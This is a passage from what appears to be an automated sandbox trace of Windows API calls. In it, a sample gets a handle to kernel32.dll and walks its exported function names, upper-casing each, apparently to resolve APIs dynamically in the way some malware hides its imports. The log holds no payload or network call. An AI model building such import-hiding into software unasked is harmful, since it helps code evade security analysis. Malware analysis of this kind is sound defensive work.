(lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.881] GetTickCount () returned 0x114c36f [0078.881] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.882] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.882] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.882] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.882] lstrlenA (lpString="kernel32.dll") returned 12 [0078.882] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.882] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.882] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.882] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.882] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.882] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.882] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.882] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.882] lstrlenA (lpString="ADDATOMA") returned 8 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.883] lstrlenA (lpString="ADDATOMW") returned 8 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.883] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.883] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.883] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.883] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.883] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.883] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.883] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.883] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.883] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.883] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.883] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.883] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.883] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.883] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.883] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.883] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.883] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.883] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.884] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.884] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.884] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.884] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.884] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.884] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.884] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.884] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.884] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.884] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.884] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.884] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.884] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.884] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.884] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.884] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.884] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.884] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.884] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.885] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.885] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.885] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.885] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.885] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.885] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.885] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.885] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.885] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.885] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.885] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.885] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.885] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.885] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.885] lstrlenA (lpString="BEEP") returned 4 [0078.885] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.885] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.886] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.886] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.886] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.886] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.886] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.886] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.886] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.886] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.886] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.886] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.886] lstrlenA (lpString="CANCELIO") returned 8 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.886] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.886] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.886] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.886] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.886] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.886] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.886] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.886] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.887] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.887] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.887] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.887] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.887] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.887] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.887] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.887] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.887] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.887] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.887] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.887] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.887] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.887] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.887] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.887] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.887] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.887] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.887] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.887] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.888] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.888] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.888] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.888] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.888] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.888] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.888] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.888] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.888] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.888] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.888] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.888] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.888] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.888] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.888] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.888] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.888] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.888] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.888] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.889] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.889] lstrlenA (lpString="COPYFILEA") returned 9 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.889] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.889] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.889] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.889] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.889] lstrlenA (lpString="COPYFILEW") returned 9 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.889] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.889] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: 